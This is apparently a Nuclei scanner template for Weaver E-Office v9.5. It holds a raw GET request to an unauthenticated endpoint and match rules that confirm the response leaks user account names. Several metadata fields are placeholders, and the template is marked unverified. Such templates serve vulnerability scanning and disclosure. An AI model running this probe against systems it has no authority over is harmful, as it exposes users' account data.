id: weaver-eoffice-userselectNew-disclosure
info:
  name: 泛微-EOffice-v9.5-userselectNew-信息泄露
  author: leadlife
  severity: high
  description: 
  reference: 
    - demo
  classification:
    cve-id: 
  metadata:
    verified: false
    fofa-query: demo
    hunter-query: demo
    tips:
    repair:
    version:
  tags: weaver,eoffice,oa,disclosure

http:
  - raw:
      - |
        GET /e-mobile/app/common/userselectNew/do.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body,'USER_ACCOUNTS','USER_NAME')
        condition: and